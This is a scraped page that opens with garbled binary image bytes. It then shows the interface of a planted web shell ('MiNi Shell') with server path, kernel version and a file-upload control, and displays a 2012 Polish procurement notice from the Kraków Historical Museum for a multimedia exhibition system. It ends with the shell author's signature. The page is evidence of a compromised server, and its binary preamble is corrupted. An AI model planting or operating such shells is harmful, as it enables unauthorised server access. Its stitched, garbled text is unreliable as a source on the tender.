JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121012/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121012/218503-N-2012.html

<p class="kh_header"><b>Kraków: DOSTAWA, MONTAŻ I URUCHOMIENIE SYSTEMU MULTIMEDIALNEGO DLA POTRZEB WYSTAWY STAŁEJ W APTECE POD ORŁEM  - FILII ODDZIAŁU ZAMAWIAJĄCEGO STARA SYNAGOGA PRZY PLACU BOHATERÓW GETTA 18 W KRAKOWIE</b><br>
<b>Numer ogłoszenia: 218503 - 2012; data zamieszczenia: 12.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Historyczne Miasta Krakowa , Rynek Główny 35, 31-011 Kraków, woj. małopolskie, tel. 012 422 32 64, faks 012 422 32 64.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA, MONTAŻ I URUCHOMIENIE SYSTEMU MULTIMEDIALNEGO DLA POTRZEB WYSTAWY STAŁEJ W APTECE POD ORŁEM  - FILII ODDZIAŁU ZAMAWIAJĄCEGO STARA SYNAGOGA PRZY PLACU BOHATERÓW GETTA 18 W KRAKOWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA, MONTAŻ I URUCHOMIENIE SYSTEMU MULTIMEDIALNEGO DLA POTRZEB WYSTAWY STAŁEJ W APTECE POD ORŁEM  - FILII ODDZIAŁU ZAMAWIAJĄCEGO STARA SYNAGOGA PRZY PLACU BOHATERÓW GETTA 18 W KRAKOWIE

zgodnie z Opisem Przedmiotu Zamówienia zawartym w załączniku nr 1 do niniejszej SIWZ i Formularzem Cenowym stanowiącym załącznik nr 6 do niniejszej SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6, 32.32.12.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje obowiązku wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają wymóg określony w art. 22 ust. 1 ustawy PZP w  zakresie wiedzy 
i doświadczenia tj. 

wykonali należycie w okresie ostatnich trzech lat przed terminem składania ofert 
(a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie), dwa zamówienia o wartości minimum 300 000,00 zł brutto każda, polegających na dostawie, konfiguracji, montażu i uruchomieniu systemu multimedialnego i systemu zintegrowanego  sterowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	podpisany i wypełniony FORMULARZ OFERTOWY - według zał. nr 2 do nin. SIWZ,
2.	pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej. 
3.	podpisany i wypełniony FORMULARZ CENOWY - zał. nr 6 do nin. SIWZ,


2)	W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda w szczególności:
wymagane dołączenie do oferty certyfikatu producenta zintegrowanego systemu sterowania w zakresie autoryzowanego dealera lub partnera w zakresie integracji systemów, programowania i instalacji na terenie Polski</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu. Zmiany te nie mogą naruszać postanowień art. 144 ust. 1 Prawa zamówień publicznych, a potrzeba ich wprowadzenia może wynikać jedynie 
z następujących okoliczności:
1)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
2)	zmian teleadresowych określonych w niniejszej umowie,
3)	oczywistych omyłek pisarskich,
4)	zmiany postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli którakolwiek pozycja asortymentu określonego w załączniku nr 4 do niniejszej umowy - Formularzu Cenowym, zostanie wycofana z produkcji. Warunkiem takiej zmiany będzie otrzymanie przez Zamawiającego  pisma od Wykonawcy, w którym zostanie stwierdzony ten fakt oraz zostanie zaproponowane nowe urządzenie, o nie gorszych parametrach od urządzenia wcześniej zaoferowanego przez Wykonawcę w Ofercie (asortyment równoważny) oraz   w                                       niezmienionej                                cenie                             i zaakceptowanie tej zmiany przez Zamawiającego.
5)	zmianie ulegnie stawka podatku od towarów i usług na dostawy, stanowiące przedmiot zamówienia, wówczas wynagrodzenie brutto określone w umowie ulegnie odpowiedniej zmianie, w taki sposób, aby wynikające z umowy wynagrodzenie netto pozostało niezmienione;
6)	nastąpi zmiana terminu otwarcia wystawy, dla potrzeb której system multimedialny stanowiący przedmiot niniejszej umowy miał być dostarczony. Termin wykonania przedmiotu umowy zostanie wówczas odpowiednio przesunięty o termin, uzgodniony między Stronami. Strony mają prawo do zmiany treści umowy w tym zakresie.
7)	w przypadku wyrażenia  zgody przez  Zamawiającego na przedłużenie terminu wykonania dostaw, montażu, uruchomienia systemu multimedialnego na skutek zaistnienia następujących okoliczności:
- z powodu okoliczności siły wyższej np.: wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie było można przewidzieć z całą pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody o znacznych rozmiarach,
-  z powodu działań osób trzecich uniemożliwiających wykonanie montażu systemu multimedialnego, które to działania nie są zawinione  przez którąkolwiek z Stron
-  w sytuacji zmian przedmiotu zamówienia na skutek wystąpienia następujących okoliczności:
a) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu
    zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany
    te są korzystne dla Zamawiającego, z zastrzeżeniem, że inny sposób wykonania 
    zamówienia nie może wykroczyć poza określenie przedmiotu umowy, zawarte
    w Opisie Przedmiotu Zamówienia
b) z powodu zaniechania lub uzasadnionej rezygnacji z wykonania danego zakresu
    dostaw objętych  przedmiotem zamówienia
2.	Jednocześnie strony oświadczają, iż w przypadku kiedy z powodu nadzwyczajnej zmiany stosunków, spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, czego Strony nie przewidywały przy zawarciu umowy, zmiana umowy będzie dopuszczalna w trybie art. 357 1 ustawy Kodeks Cywilny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mhk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, 31-011 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2012 godzina 09:00, miejsce: Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, 31-011 Kraków, Sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający dopuszcza do powierzenia podwykonawcom realizacje przedmiotu zamówienia, określonego w załączniku nr 1 do SIWZ

Zamawiający nie przewiduje prawa opcji.

1.	Zamawiający zawiera umowę w sprawie zamówienia publicznego w terminie określonym w art. 94 Ustawy.
2.	Jeżeli Wykonawca, którego oferta została wybrana, uchyla się od zawarcia umowy 
o udzielenie zamówienia publicznego, Zamawiający wybiera ofertę najkorzystniejszą spośród pozostałych ofert, bez przeprowadzania ich ponownej oceny, chyba, że 
w postępowaniu została złożona tylko jedna oferta (oferta Wykonawcy, który się uchyla). 
3.	Najpóźniej do dnia zawarcia umowy Wykonawca jest zobowiązany przedstawić Zamawiającemu następujące dokumenty:
1)	Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli wykonawcą jest przedsiębiorca wpisany do ewidencji działalności gospodarczej.
2)	W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego Wykonawcy ci - są zobowiązani do przedłożenie Zamawiającemu umowy regulującą współpracę tych Wykonawców.
3)	Jeśli wykonawcą jest spółka cywilna przedłożyć należy wyciąg z umowy spółki oraz ewentualną uchwałę wszystkich wspólników w zakresie należytej reprezentacji(art. 866 k.c.). W przypadku, gdy dokumenty ofertowe podpisuje jeden ze wspólników spółki cywilnej, pozostali jej przedsiębiorcy muszą przedłożyć stosowne dla niego upoważnienie do reprezentowania w sprawie (wybór Wykonawcy będącego spółką cywilną, skutkuje podpisaniem umowy ze wszystkimi przedsiębiorcami prowadzącymi w jej formie i nazwie działalność gospodarczą). 
4)	Osoby reprezentujące Wykonawcę przy podpisywaniu umowy powinny posiadać ze sobą dokumenty potwierdzające, ich umocowanie do podpisania umowy, o ile umocowanie to nie będzie wynikać z dokumentów załączonych do oferty.
Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy.

Informacja o zabezpieczeniu:

1)	Zgodnie z dyspozycją art. 147 ustawy Zamawiający żąda zabezpieczenia należytego wykonania umowy na przedmiot zamówienia określony 
w ZAŁĄCZNIKU NR 1 do SIWZ - OPIS PRZEDMIOTU ZAMÓWIENIA. 
2)	Zabezpieczenie to służyć będzie pokryciu ewentualnych roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.
3)	Zamawiający żąda od Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy przed dniem zawarcia umowy - pod rygorem jej nie podpisania, w wysokości:


5 % wartości umowy brutto 


4)	Zgodnie z dyspozycją art. 148 ustawy zabezpieczenie może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach:

a.	Pieniądzu - OBOWIĄZKOWO PRZELEWEM;
na konto:
Banku PEKAO S.A 		62 1240 1431 1111 0010 1944 5624

Wniesienie zabezpieczenia w pieniądzu Zamawiający uznaje za skuteczne, jeżeli jest ono wniesione tj. znajdzie się na rachunku bankowym Zamawiającego - data uznania rachunku Zamawiającego - przed upływem terminu zawarcia umowy.
Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem 
na rachunek bankowy wskazany przez Zamawiającego.
Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu wraz z odsetkami wynikającymi 
z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.

b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b 
ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Uwaga:
Odpowiedni dokument, o którym mowa w lit. b, c, d, e, musi zostać złożony w pokoju nr 10 (księgowość - Kasa MHK) w głównej siedzibie MHK (Rynek Główny 35, Kraków 31-011) - przed upływem terminu wyznaczonego na podpisanie umowy.

Zabezpieczenie wnoszone w formie gwarancji bankowej lub poręczenia banku albo spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji ubezpieczeniowej, czy też poręczenia udzielonego przez podmioty, o których mowa w lit. e powinno zawierać następujące elementy:
1.	określenie terminu obowiązywania poręczenia (nie krócej niż wymagany przez Zamawiającego minimalny okres rękojmi 
na wykonanie Przedmiotu Zamówienia, liczony od momentu przekazania Zamawiającemu gotowego przedmiotu umowy - czyli od pierwszego dnia od dnia podpisania protokołu odbioru za drugi etap Przedmiotu Zamówienia),
2.	określenie kwoty poręczenia 
3.	wskazanie gwaranta poręczenia 
4.	wskazanie beneficjenta poręczenia 
5.	zapis, iż poręczyciel / gwarant zobowiązuje się bezwarunkowo 
tj. na pierwsze żądanie, do zapłaty pełnej kwoty zabezpieczenia na rzecz beneficjenta,
6.	nieodwołalność poręczenia 
5)	Zamawiający nie wyraża zgodny na wniesienie zabezpieczenia w formach określonych art. 148 ust. 1 pkt 2 ustawy PZP.
6)	Zamawiający zwróci zabezpieczenie w wysokości 70% w terminie 30 dni od daty wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane. Pozostała kwota - 30% zabezpieczenia, pozostawiona na roszczenia z tytułu rękojmi za wady - zostanie zwrócona nie później niż w 15 dniu po upływie okresu rękojmi. W przypadku wniesienia zabezpieczenia należytego wykonania umowy w formie określonej w art. 148 ust. 1 pkt 2-5 ustawy Prawo zamówień publicznych. Wykonawca zobowiązuje się dopilnować, aby w treści dokumentów gwarancyjnych zostały wyróżnione okresy zabezpieczenia, o których mowa w zdaniu poprzednim oraz odpowiednio przypisane im kwoty. W innym przypadku, Zamawiający zwróci zabezpieczenie w wysokości 70% dopiero wówczas gdy Wykonawca przedłoży nowy dokument gwarancyjny, z którego treści będzie wynikać, iż roszczenia z tytułu rękojmi za wady będą zabezpieczone kwotą - 30% zabezpieczenia.
7)	W trakcie realizacji umowy Wykonawca będzie mógł dokonać zmiany formy zabezpieczenia o ile zaistnieje taka potrzeba na jedną lub kilka form, o których mowa w art. 148 ust. 1 Ustawy. Zmiana formy zabezpieczenia będzie musiała być dokonana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com